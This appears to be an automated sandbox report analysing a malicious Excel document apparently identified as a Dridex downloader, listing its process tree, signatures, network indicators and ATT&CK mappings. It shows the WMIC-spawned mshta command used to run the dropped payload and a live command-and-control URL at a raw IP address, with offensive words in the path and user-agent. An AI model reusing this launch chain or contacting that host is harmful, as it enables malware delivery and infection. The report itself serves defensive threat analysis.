Loading ...

Play interactive tourEdit tour

Windows Analysis Report order 4544471372.xls

Overview

General Information

Sample Name:order 4544471372.xls
Analysis ID:532575
MD5:531039a455e1f0598cd201b785a1152a
SHA1:4880df9e94090243029e54a34e941c70298401c7
SHA256:cf0d6ea61f8e56f80f24792e356adeab2f92b6db2f980a9e5932415484f5b732
Tags:Dridexxlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Queries the volume information (name, serial number etc) of a device
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Detected potential crypto function
Creates a window with clipboard capturing capabilities
Potential document exploit detected (performs HTTP gets)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 800 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WMIC.exe (PID: 2012 cmdline: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf" MD5: FD902835DEAEF4091799287736F3A028)
  • mshta.exe (PID: 1972 cmdline: mshta C:\ProgramData\tCeltZ.rtf MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\tCeltZ.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 800, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf", ProcessId: 2012
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 800, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\tCeltZ.rtf", ProcessId: 2012

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: order 4544471372.xlsReversingLabs: Detection: 13%
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 149.129.254.152:8080
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 149.129.254.152:8080
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 149.129.254.152:8080
      Source: Joe Sandbox ViewIP Address: 149.129.254.152 149.129.254.152
      Source: unknownTCP traffic detected without corresponding DNS query: 149.129.254.152
      Source: unknownTCP traffic detected without corresponding DNS query: 149.129.254.152
      Source: unknownTCP traffic detected without corresponding DNS query: 149.129.254.152
      Source: unknownTCP traffic detected without corresponding DNS query: 149.129.254.152
      Source: EXCEL.EXE, 00000000.00000002.690239943.0000000004FB0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689081220.0000000003A30000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmpString found in binary or memory: http://149.129.254..6.0?_
      Source: mshta.exe, 00000006.00000002.688964982.00000000035E0000.00000004.00000001.sdmpString found in binary or memory: http://149.129.254.152:8080
      Source: mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dad.12
      Source: mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5.macroE
      Source: mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cacro
      Source: mshta.exe, 00000006.00000002.689908661.0000000004365000.00000004.00000040.sdmp, mshta.exe, 00000006.00000002.688498350.0000000000553000.00000004.00000020.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
      Source: mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcY
      Source: mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcation/
      Source: mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcd.ms-m
      Source: mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcel.tem
      Source: mshta.exe, 00000006.00000002.689908661.0000000004365000.00000004.00000040.sdmpString found in binary or memory: http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcu
      Source: mshta.exe, 00000006.00000002.688964982.00000000035E0000.00000004.00000001.sdmpString found in binary or memory: http://149.129.254.152:8V
      Source: mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmpString found in binary or memory: http://149.129.254.152tf
      Source: mshta.exe, 00000006.00000002.688964982.00000000035E0000.00000004.00000001.sdmpString found in binary or memory: http://149.K
      Source: EXCEL.EXE, 00000000.00000002.690239943.0000000004FB0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689081220.0000000003A30000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: EXCEL.EXE, 00000000.00000002.690239943.0000000004FB0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689081220.0000000003A30000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: EXCEL.EXE, 00000000.00000002.690515807.0000000005197000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689315306.0000000003C17000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: EXCEL.EXE, 00000000.00000002.690515807.0000000005197000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689315306.0000000003C17000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: EXCEL.EXE, 00000000.00000002.688581731.0000000000402000.00000004.00000001.sdmpString found in binary or memory: http://ns.a
      Source: EXCEL.EXE, 00000000.00000002.688581731.0000000000402000.00000004.00000001.sdmpString found in binary or memory: http://ns.ad
      Source: EXCEL.EXE, 00000000.00000002.688581731.0000000000402000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado
      Source: EXCEL.EXE, 00000000.00000002.688581731.0000000000402000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.
      Source: EXCEL.EXE, 00000000.00000002.688581731.0000000000402000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c
      Source: EXCEL.EXE, 00000000.00000002.688581731.0000000000402000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.co
      Source: EXCEL.EXE, 00000000.00000002.692842180.0000000005486000.00000004.00000001.sdmpString found in binary or memory: http://schemas.op
      Source: EXCEL.EXE, 00000000.00000002.693441234.0000000007976000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.693399201.00000000076A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.693370068.00000000071F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.693420826.0000000007816000.00000004.00000001.sdmpString found in binary or memory: http://schemas.open
      Source: EXCEL.EXE, 00000000.00000002.693370068.00000000071F0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/content-t
      Source: EXCEL.EXE, 00000000.00000002.693441234.0000000007976000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.693399201.00000000076A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.693420826.0000000007816000.00000004.00000001.sdmpString found in binary or memory: http://schemas.openformatrg/package/2006/r
      Source: mshta.exe, 00000006.00000002.689533804.0000000003E10000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: WMIC.exe, 00000003.00000002.559211343.0000000001AB0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: EXCEL.EXE, 00000000.00000002.690515807.0000000005197000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689315306.0000000003C17000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: EXCEL.EXE, 00000000.00000002.690515807.0000000005197000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689315306.0000000003C17000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: mshta.exe, 00000006.00000002.689533804.0000000003E10000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: EXCEL.EXE, 00000000.00000002.690239943.0000000004FB0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689081220.0000000003A30000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: EXCEL.EXE, 00000000.00000002.690515807.0000000005197000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689315306.0000000003C17000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: EXCEL.EXE, 00000000.00000002.690239943.0000000004FB0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689081220.0000000003A30000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: mshta.exe, 00000006.00000002.689081220.0000000003A30000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83027875.pngJump to behavior
      Source: global trafficHTTP traffic detected: GET /6tfcnfucknugget4gpenis3dade5z6cpc HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: rapeHost: 149.129.254.152:8080
      Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\tCeltZ.rtf, type: DROPPED

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: Enable Editing" and "Enable Content" to display. 3 Data paiuo aano iiuiue oiue'luu:nod notr Servi
      Source: Screenshot number: 4Screenshot OCR: Enable Content" to display. 3 Data paiuo aano iiuiue oiue'luu:nod notr Service issue 4 -le 1Iau,
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: order 4544471372.xlsInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: order 4544471372.xlsInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: EXCEL.EXE, 00000000.00000002.693141243.0000000005B5F000.00000004.00000001.sdmpBinary or memory string: racle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\bsC:\Windows\System32\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\tCeltZ.rtf"tiC:\Windows\System32\Wbem\wmic.exeWinSta0\Default="=C:=C:\U
      Found obfuscated Excel 4.0 MacroShow sources
      Source: order 4544471372.xlsMacro extractor: Sheet: Macro1 high usage of CHAR() function: 26
      Source: order 4544471372.xlsMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_001272B80_2_001272B8
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXECode function: 0_2_024E78200_2_024E7820
      Source: order 4544471372.xlsReversingLabs: Detection: 13%
      Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\tCeltZ.rtf"
      Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\tCeltZ.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\tCeltZ.rtf"Jump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
      Source: EXCEL.EXE, 00000000.00000002.690239943.0000000004FB0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689081220.0000000003A30000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$order 4544471372.xlsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRFCC5.tmpJump to behavior
      Source: classification engineClassification label: mal96.troj.expl.evad.winXLS@4/6@0/1
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: order 4544471372.xlsInitial sample: OLE zip file path = xl/media/image1.png
      Source: order 4544471372.xlsInitial sample: OLE zip file path = docProps/custom.xml
      Source: 7E530000.0.drInitial sample: OLE zip file path = xl/media/image1.png
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: unknownProcess created: cmd line: tceltz.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: cmd line: tceltz.rtfJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exe TID: 2536Thread sleep time: -180000s >= -30000sJump to behavior
      Source: C:\Windows\System32\mshta.exe TID: 2704Thread sleep time: -60000s >= -30000sJump to behavior
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: EXCEL.EXE, 00000000.00000002.688649967.00000000007E0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.688551943.00000000012E0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: EXCEL.EXE, 00000000.00000002.688649967.00000000007E0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.688551943.00000000012E0000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: EXCEL.EXE, 00000000.00000002.688649967.00000000007E0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.688551943.00000000012E0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting3Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution22Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection2NTDSSystem Information Discovery15Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting3LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsApplication Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      order 4544471372.xls13%ReversingLabsDocument-Excel.Trojan.Heuristic

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://149.129.254.152tf0%Avira URL Cloudsafe
      http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcY0%Avira URL Cloudsafe
      http://schemas.op0%Avira URL Cloudsafe
      http://ns.adobe.co0%VirustotalBrowse
      http://ns.adobe.co0%Avira URL Cloudsafe
      http://149.K0%Avira URL Cloudsafe
      http://ns.adobe.c0%Avira URL Cloudsafe
      http://schemas.openformatrg/package/2006/content-t0%URL Reputationsafe
      http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc0%Avira URL Cloudsafe
      http://ns.a0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://ns.ad0%URL Reputationsafe
      http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dad.120%Avira URL Cloudsafe
      http://schemas.open0%URL Reputationsafe
      http://149.129.254.152:80800%Avira URL Cloudsafe
      http://149.129.254..6.0?_0%Avira URL Cloudsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://schemas.openformatrg/package/2006/r0%URL Reputationsafe
      http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5.macroE0%Avira URL Cloudsafe
      http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcd.ms-m0%Avira URL Cloudsafe
      http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cacro0%Avira URL Cloudsafe
      http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcation/0%Avira URL Cloudsafe
      http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcel.tem0%Avira URL Cloudsafe
      http://ns.ado0%URL Reputationsafe
      http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcu0%Avira URL Cloudsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://ns.adobe.0%URL Reputationsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe
      http://149.129.254.152:8V0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcfalse
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://www.windows.com/pctv.mshta.exe, 00000006.00000002.689081220.0000000003A30000.00000002.00020000.sdmpfalse
        high
        http://149.129.254.152tfmshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        low
        http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpcYmshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://investor.msn.comEXCEL.EXE, 00000000.00000002.690239943.0000000004FB0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689081220.0000000003A30000.00000002.00020000.sdmpfalse
          high
          http://www.msnbc.com/news/ticker.txtEXCEL.EXE, 00000000.00000002.690239943.0000000004FB0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689081220.0000000003A30000.00000002.00020000.sdmpfalse
            high
            http://schemas.opEXCEL.EXE, 00000000.00000002.692842180.0000000005486000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://ns.adobe.coEXCEL.EXE, 00000000.00000002.688581731.0000000000402000.00000004.00000001.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://149.Kmshta.exe, 00000006.00000002.688964982.00000000035E0000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://ns.adobe.cEXCEL.EXE, 00000000.00000002.688581731.0000000000402000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.openformatrg/package/2006/content-tEXCEL.EXE, 00000000.00000002.693370068.00000000071F0000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            unknown
            http://ns.aEXCEL.EXE, 00000000.00000002.688581731.0000000000402000.00000004.00000001.sdmpfalse
            • URL Reputation: safe
            unknown
            http://windowsmedia.com/redir/services.asp?WMPFriendly=trueEXCEL.EXE, 00000000.00000002.690515807.0000000005197000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689315306.0000000003C17000.00000002.00020000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oeEXCEL.EXE, 00000000.00000002.690239943.0000000004FB0000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689081220.0000000003A30000.00000002.00020000.sdmpfalse
              high
              http://ns.adEXCEL.EXE, 00000000.00000002.688581731.0000000000402000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              unknown
              http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dad.12mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://schemas.openEXCEL.EXE, 00000000.00000002.693441234.0000000007976000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.693399201.00000000076A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.693370068.00000000071F0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.693420826.0000000007816000.00000004.00000001.sdmpfalse
              • URL Reputation: safe
              unknown
              http://149.129.254.152:8080mshta.exe, 00000006.00000002.688964982.00000000035E0000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://149.129.254..6.0?_mshta.exe, 00000006.00000002.688445295.00000000004CE000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              low
              http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&CheckEXCEL.EXE, 00000000.00000002.690515807.0000000005197000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689315306.0000000003C17000.00000002.00020000.sdmpfalse
                high
                http://www.icra.org/vocabulary/.EXCEL.EXE, 00000000.00000002.690515807.0000000005197000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.689315306.0000000003C17000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://schemas.openformatrg/package/2006/rEXCEL.EXE, 00000000.00000002.693441234.0000000007976000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.693399201.00000000076A6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.693420826.0000000007816000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                unknown
                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.mshta.exe, 00000006.00000002.689533804.0000000003E10000.00000002.00020000.sdmpfalse
                  high
